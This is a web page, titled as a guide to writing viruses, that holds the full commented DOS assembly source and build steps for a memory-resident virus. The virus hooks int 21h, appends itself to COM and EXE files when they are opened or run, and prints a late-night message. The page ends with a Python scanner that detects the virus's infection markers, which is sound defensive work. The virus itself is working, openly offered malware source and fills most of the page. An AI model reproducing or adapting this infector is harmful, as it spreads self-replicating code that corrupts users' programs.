Write viruses that infect COM and EXE files

Source: Internet
Author: User

; This program is a modified and upgraded version of the V0 virus
; and has some ability to infect files under DOS.
; Parts of it use 32-bit instructions.
; Build procedure:
;   tasm32 dv1;
;   tlink dv1;
;   debug dv1.exe
;   -n dv1.com
;   -w
;   -q
; which finally produces the Dv1.com virus program.

off             equ     offset

DOSMCB          struc                               ; DOS memory control block (partial)
flag            db      ?                           ; 'M' = not the last block, 'Z' = last block
owner           dw      ?                           ; 0008h = owned by DOS itself, 0 = free block
sizes           dw      ?                           ; size of this block in paragraphs (1 = 10h bytes)
DOSMCB          ends

Exeheader       struc                               ; EXE file header
flags           dw      'ZM'                        ; EXE signature ("MZ")
modsize         dw      ?                           ; bytes in the last page of the file
pages           dw      ?                           ; number of 512-byte pages in the file
reloc           dw      ?                           ; number of relocation items
mesize          dw      ?                           ; header size in paragraphs
minmem          dw      ?                           ; minimum memory required (paragraphs)
maxmem          dw      ?                           ; maximum memory wanted (paragraphs)
startss         dw      ?                           ; initial SS (relative to the load segment)
startsp         dw      ?                           ; initial SP
checksum        dw      ?                           ; header checksum (not used by DOS)
startip         dw      ?                           ; initial IP
startcs         dw      ?                           ; initial CS (relative to the load segment)
relocoff        dw      ?                           ; file offset of the relocation table
Exeheader       ends

virussize       = off @@End - off @@Start           ; size of the virus in bytes
virusmemsize    = off @@MemEnd - off @@Start        ; memory the virus needs

                .386
                .model  small
                .code
                org     100h                        ; written in COM format
@@Start:                                            ; virus entry block
                pusha                               ; save all general registers
                mov     ax,4D4Dh
                int     21h                         ; already resident? (custom "are you there" call)
                cmp     ax,4D4Dh
                jz      short @@ExecOldApp          ; yes: skip installation
                call    @@Install                   ; no: run the install block
@@ExecOldApp:
                mov     ah,2Ch
                int     21h                         ; get system time (CH:CL = hours:minutes)
                cmp     cx,22*100h+30               ; is it 22:30 yet?
                jb      short @@TestFlag            ; not until 22:30: skip the message
                call    @@DisplayMsg                ; show the message (payload block)
@@TestFlag:
                clc                                 ; CLC means the host is a COM file; patched to STC when an EXE is infected
                jc      short @@IsExeApp
@@IsComApp:
                call    @@GetOldComAppCode
oldappcode      dw      20CDh                       ; 0CDh,20h = int 20h, returns to DOS
                dw      0000h                       ; the original first 4 bytes of the COM host are kept here
@@GetOldComAppCode:
                pop     si                          ; address of oldappcode
                mov     di,100h
                cld
                lodsd
                stosd                               ; restore the first 4 bytes of the COM host
                popa                                ; restore all general registers
                push    word ptr 100h
                ret                                 ; run the original COM program
@@IsExeApp:
                popa                                ; restore all general registers
                cli                                 ; interrupts off while the stack pointer is changed
                mov     sp,es                       ; PSP segment (SP = PSP segment)
                add     sp,10h
spadddata       dw      0C481h                      ; 81h,0C4h = add sp,xxxx
oldappss        dw      000h                        ; original relative SS of the EXE host
                mov     ss,sp                       ; compute and restore the host's stack segment
movedatatosp    db      0BCh                        ; 0BCh = mov sp,xxxx
oldappsp        dw      000h                        ; original SP of the EXE host
                sti                                 ; interrupts back on
                push    ax
                mov     ax,es                       ; PSP segment (AX = PSP segment)
                add     ax,10h
axadddata       db      005h                        ; 05h = add ax,xxxx; computes the host's CS
oldappcs        dw      000h                        ; original relative CS of the EXE host
                movzx   esp,sp                      ; switch to 32-bit [ESP] stack addressing
                xchg    ax,[esp]                    ; restore AX; 16-bit code cannot address [SP]
pushworddata    db      068h                        ; 68h = push word ptr xxxx
oldappip        dw      000h                        ; original IP of the EXE host
                retf                                ; run the original EXE program
@@Install:
                push    ds
                push    es                          ; save segment registers
                mov     ax,ds
                dec     ax                          ; our own MCB sits just before the program's PSP
@@ContFindLastMcb:
                mov     ds,ax
                cmp     ds:[flag],'Z'               ; is this the last block?
                jz      short @@FoundLastMcb
                add     ax,ds:[sizes]
                inc     ax                          ; next MCB = this segment + this block's size + 1
                jmp     short @@ContFindLastMcb
@@FoundLastMcb:
                sub     ds:[sizes],(virusmemsize/10h)+1   ; shrink the last block by what the virus needs (paragraphs)
                add     ax,ds:[sizes]
                inc     ax                          ; segment of the space carved out at the top of that block
                mov     es,ax
                xor     di,di
                push    cs
                pop     ds                          ; reset data segment
                call    @@GetVirusBase
@@GetVirusBase:
                pop     si
                sub     si,off @@GetVirusBase - off @@Start   ; address of the virus start
                mov     cx,virussize
                cld
                rep     movsb                       ; copy the virus to high memory
                sub     ax,10h                      ; segment of the high copy (virus is assembled at offset 100h, so back off 10h)
                mov     ds,ax
@@ContInstall:
                mov     ax,3521h
                int     21h                         ; get the int 21h vector and save it
                mov     ds:oldint21seg,es
                mov     ds:oldint21off,bx
                lea     dx,@@NewInt21
                mov     ax,2521h
                int     21h                         ; point int 21h at @@NewInt21
                pop     es
                pop     ds
                ret
@@NewInt21:                                         ; new int 21h handler (infection block)
                cmp     ax,4D4Dh
                jnz     short @@NextHook
                iret                                ; custom "are you there" call: return directly
@@NextHook:
                cmp     ah,4Bh
                jz      short @@MyBeCom
                cmp     ah,43h
                jz      short @@MyBeCom
                cmp     ah,3Dh
                jz      short @@MyBeCom             ; intercept DOS functions 4Bh, 43h and 3Dh
@@JmpOldInt21:
                cli                                 ; interrupts off before entering the old int 21h
jmpfar          db      0EAh                        ; far jump: jmp xxxx:xxxx
oldint21off     dw      ?
oldint21seg     dw      ?
@@CallInt21:                                        ; simulates an int 21h instruction
                pushf
                push    cs
                call    @@JmpOldInt21
                ret
@@MyBeCom:                                          ; on entry ds:dx = zero-terminated file name
                pusha
                push    ds
                mov     si,dx
                xor     al,al
@@ContFindExtName:                                  ; find the extension
                inc     si
                cmp     [si],al
                jnz     short @@ContFindExtName
                mov     eax,[si-4]
                or      eax,20202020h               ; force lowercase
                cmp     eax,'moc.'                  ; a .com file?
                jz      short @@IsComFile
                cmp     eax,'exe.'                  ; an .exe file?
                jz      short @@IsExeFile
@@ExitOpt:
                pop     ds
                popa
                jmp     short @@JmpOldInt21
@@IsComFile:
                mov     ax,3D02h
                call    @@CallInt21                 ; 3Dh: open the COM file read/write
                jc      short @@OptComFalse         ; failed
                mov     bx,ax
                push    cs
                pop     ds                          ; reset data segment
                mov     byte ptr ds:[@@TestFlag],0F8h   ; patch to CLC: the host is a COM file
                lea     dx,oldappcode
                mov     cx,4
                mov     ah,3Fh
                int     21h                         ; read the first 4 bytes of the file
                jc      short @@CloseComFile
                mov     si,dx
                cmp     word ptr [si],'ZM'          ; an EXE in disguise? (the extension alone is not enough)
                jz      short @@CloseComFile        ; yes: do not infect
                cmp     byte ptr [si+3],'V'         ; infection marker present?
                jz      short @@CloseComFile        ; yes: already infected
                mov     ax,4202h
                xor     cx,cx
                xor     dx,dx
                int     21h                         ; seek to end of file; dx:ax = file length
                or      dx,dx
                jnz     short @@CloseComFile        ; file too large to infect
                mov     dx,ax
                add     ax,virussize
                jc      short @@CloseComFile        ; file too large to infect
                cmp     ax,0FD00h
                ja      short @@CloseComFile        ; file too large to infect
                sub     dx,03                       ; displacement of the jmp to the virus
                mov     ds:jmpoffset,dx
                lea     dx,@@Start
                mov     cx,virussize
                mov     ah,40h
                int     21h                         ; write the virus at the end of the file
                mov     ax,4200h
                xor     cx,cx
                xor     dx,dx
                int     21h                         ; seek back to the start of the file
                mov     cx,04h
                lea     dx,@@JmpVirus
                mov     ah,40h
                int     21h                         ; write the 4-byte jmp + marker over the file head
@@CloseComFile:
                mov     ah,3Eh
                int     21h                         ; close the file
@@OptComFalse:
                jmp     short @@ExitOpt
@@IsExeFile:
                mov     ax,3D02h
                call    @@CallInt21                 ; 3Dh: open the EXE file read/write
                jc      @@OptExeFalse               ; failed
                mov     bx,ax
                push    cs
                pop     ds                          ; reset data segment
                mov     byte ptr ds:[@@TestFlag],0F9h   ; patch to STC: the host is an EXE file
                lea     dx,myexeheader
                mov     cx,size Exeheader
                mov     ah,3Fh
                int     21h                         ; read the EXE header
                jc      @@CloseExeFile
                cmp     ax,cx
                jb      @@CloseExeFile
                mov     si,dx
                cmp     word ptr [si.flags],'ZM'    ; really an EXE? (the extension alone is not enough)
                jnz     @@CloseExeFile              ; no: do not infect
                cmp     [si.checksum],'VV'          ; infection marker present?
                jz      @@CloseExeFile              ; yes: already infected
                mov     ax,4202h
                xor     cx,cx
                xor     dx,dx
                int     21h                         ; seek to end of file; dx:ax = file length
                cmp     dx,8h
                ja      short @@CloseExeFile        ; too large, probably a Windows program
                shl     edx,16
                mov     dx,ax
                push    edx                         ; save the file size
                shr     edx,4
                sub     dx,[si.mesize]              ; new relative CS of the virus inside the EXE
                and     ax,0Fh                      ; new IP of the virus inside the EXE (0 <= IP < 10h)
                mov     cx,dx                       ; cx = dx = new relative CS
                xchg    [si.startcs],dx
                mov     ds:[oldappcs],dx            ; set the new relative CS, save the original
                xchg    [si.startss],cx
                mov     ds:[oldappss],cx            ; set the new relative SS, save the original
                xchg    [si.startip],ax
                mov     ds:[oldappip],ax            ; set the new IP, save the original
                xor     ax,ax
                xchg    [si.startsp],ax             ; set SP to 0, save the original
                mov     ds:[oldappsp],ax
                mov     [si.checksum],'VV'          ; set the infection marker
                pop     edx                         ; restore the file size
                mov     ecx,virussize
                add     edx,ecx                     ; size of the file after infection
                mov     ax,dx
                and     ax,1FFh                     ; modsize of the infected file
                mov     [si.modsize],ax
                add     edx,1FFh
                shr     edx,9                       ; pages of the infected file
                mov     [si.pages],dx
                lea     dx,@@Start
                mov     ah,40h
                int     21h                         ; write the virus at the end of the file
                mov     ax,4200h
                xor     cx,cx
                xor     dx,dx
                int     21h                         ; seek back to the start of the file
                mov     cx,size Exeheader
                lea     dx,myexeheader
                mov     ah,40h
                int     21h                         ; write the modified header back
@@CloseExeFile:
                mov     ah,3Eh
                int     21h                         ; close the file
@@OptExeFalse:
                jmp     @@ExitOpt
@@JmpVirus:
jumpnear        db      0E9h                        ; near jump: jmp near xxxx
jmpoffset       dw      ?
virusflag       db      'V'                         ; the infection marker is the character 'V'
@@DisplayMsg:
                pop     dx
                push    dx
                add     dx,off @@Message - off @@TestFlag   ; offset of @@Message
                push    ds
                push    cs
                pop     ds
                mov     ah,09h
                int     21h                         ; print "Night is deep, you must go sleep!"
                pop     ds
                ret
@@Message:
                db      0Ah,0Dh,07h
                db      'Night is deep,you must go sleep!'
                db      0Ah,0Dh,'$'
                db      'Go-sleep Ver3.0 by WHG 2001.5.2'
@@End:
myexeheader     db      size Exeheader dup (?)
@@MemEnd:
                end     @@Start
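The listing leaves several fixed traces in every host it touches: a COM host starts with a near JMP followed by the byte 'V', an EXE host carries 'VV' in the CheckSum word, has its initial SP zeroed, and has its CS:IP pointed at the appended body, whose Modsize/Pages pair is recomputed from the new file length. The following Python scanner is an added example, not part of the original listing or its author's code. It parses the MZ header with the same 13-field layout the Exeheader struc declares, checks those traces, and verifies the header arithmetic against constructed sample files. The ENTRY_SIGNATURE bytes are an assumption (the standard 8086 encoding of the first four instructions at @@Start); the sample files are constructed here and contain filler bytes, not the virus body.

```python
import struct

# MZ header exactly as the listing's Exeheader struc declares it
# (13 fields, 26 bytes, little endian; the overlay-number word is omitted there).
EXE_HEADER = struct.Struct("<2s12H")
EXE_FIELDS = ("flags", "modsize", "pages", "reloc", "mesize", "minmem", "maxmem",
              "startss", "startsp", "checksum", "startip", "startcs", "relocoff")

# Markers the listing writes: 'V' after the near JMP in a COM, 'VV' in an EXE CheckSum.
COM_MARKER = ord("V")
EXE_MARKER = 0x5656
# First instructions at @@Start: pusha / mov ax,4D4Dh / int 21h / cmp ax,4D4Dh.
# Assumption: standard 8086 encoding of those four instructions.
ENTRY_SIGNATURE = bytes.fromhex("60b84d4dcd213d4d4d")
MESSAGE = b"Night is deep,you must go sleep!"
CLEAN_COM = bytes.fromhex("b8004ccd21")      # mov ax,4C00h / int 21h: a harmless stand-in host


def parse_exe_header(data: bytes) -> dict:
    """Unpack the 26-byte header into a dict keyed by the listing's field names."""
    if len(data) < EXE_HEADER.size:
        raise ValueError("too short for an MZ header")
    return dict(zip(EXE_FIELDS, EXE_HEADER.unpack_from(data)))


def exe_entry_offset(hdr: dict) -> int:
    """File offset of the initial CS:IP: (header paragraphs + relative CS) * 16 + IP."""
    return (hdr["mesize"] + hdr["startcs"]) * 16 + hdr["startip"]


def exe_declared_size(hdr: dict) -> int:
    """Image size the Pages/Modsize pair claims (Modsize 0 means a full last page)."""
    if hdr["modsize"] == 0:
        return hdr["pages"] * 512
    return (hdr["pages"] - 1) * 512 + hdr["modsize"]


def scan_exe(data: bytes) -> list:
    """Tags for each infection trace found in an EXE image; empty means none."""
    hdr = parse_exe_header(data)
    if hdr["flags"] != b"MZ":
        return ["not-mz"]
    tags = []
    if hdr["checksum"] == EXE_MARKER:
        tags.append("checksum-VV")
    if hdr["startsp"] == 0:
        tags.append("sp-zero")               # the infector always zeroes the initial SP
    entry = exe_entry_offset(hdr)
    if data[entry:entry + len(ENTRY_SIGNATURE)] == ENTRY_SIGNATURE:
        tags.append("entry-prologue")        # CS:IP lands on the appended body
    if MESSAGE in data:
        tags.append("payload-string")
    return tags


def scan_com(data: bytes) -> list:
    """Tags for a COM image: the listing overwrites bytes 0..3 with JMP rel16, 'V'."""
    tags = []
    if len(data) < 4 or data[0] != 0xE9:
        return tags
    rel = struct.unpack_from("<H", data, 1)[0]
    target = (3 + rel) & 0xFFFF              # listing stores rel = original length - 3
    if data[3] == COM_MARKER:
        tags.append("byte3-V")
    if data[target:target + len(ENTRY_SIGNATURE)] == ENTRY_SIGNATURE:
        tags.append("jmp-to-prologue")       # the JMP lands exactly on the appended body
    if MESSAGE in data:
        tags.append("payload-string")
    return tags


def scan(data: bytes) -> list:
    """Dispatch on the MZ signature, not the extension, as the listing itself does."""
    return scan_exe(data) if data[:2] == b"MZ" else scan_com(data)


def build_infected_com(host_len: int = 300) -> bytes:
    """Constructed sample laid out as the COM branch leaves a host (filler, no virus body)."""
    body = ENTRY_SIGNATURE + b"\x90" * 32 + MESSAGE + b"\r\n$"
    patched_head = bytes([0xE9]) + struct.pack("<H", host_len - 3) + b"V"
    return patched_head + b"\x90" * (host_len - 4) + body


def build_infected_exe(host_len: int = 0x600) -> bytes:
    """Constructed sample whose header is rewritten the way the EXE branch does it."""
    header_paras = 2                                   # 32-byte header in this sample
    body = ENTRY_SIGNATURE + b"\x90" * 32 + MESSAGE + b"\r\n$"
    total = host_len + len(body)
    hdr = {
        "flags": b"MZ",
        "modsize": total & 0x1FF,                      # and ax,1FFh
        "pages": (total + 0x1FF) >> 9,                 # add edx,1FFh / shr edx,9
        "reloc": 0, "mesize": header_paras, "minmem": 0, "maxmem": 0xFFFF,
        "startss": (host_len >> 4) - header_paras,     # new SS = new CS
        "startsp": 0,                                  # xor ax,ax / xchg [si.startsp],ax
        "checksum": EXE_MARKER,                        # 'VV'
        "startip": host_len & 0xF,                     # and ax,0Fh
        "startcs": (host_len >> 4) - header_paras,     # shr edx,4 / sub dx,[si.mesize]
        "relocoff": 0x1C,
    }
    raw = EXE_HEADER.pack(*(hdr[f] for f in EXE_FIELDS))
    raw += b"\x00" * (header_paras * 16 - len(raw))
    return raw + b"\x90" * (host_len - len(raw)) + body
```

The entry-offset check is the most robust of the four: the marker bytes and the message string could be changed by a variant, but an appending infector must still steer CS:IP (or the COM's first JMP) to the tail of the file, and `exe_entry_offset` reproduces the same `(size >> 4) - mesize` / `size & 0Fh` arithmetic the listing uses, so it also documents why the new CS:IP lands exactly at the old end of file.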
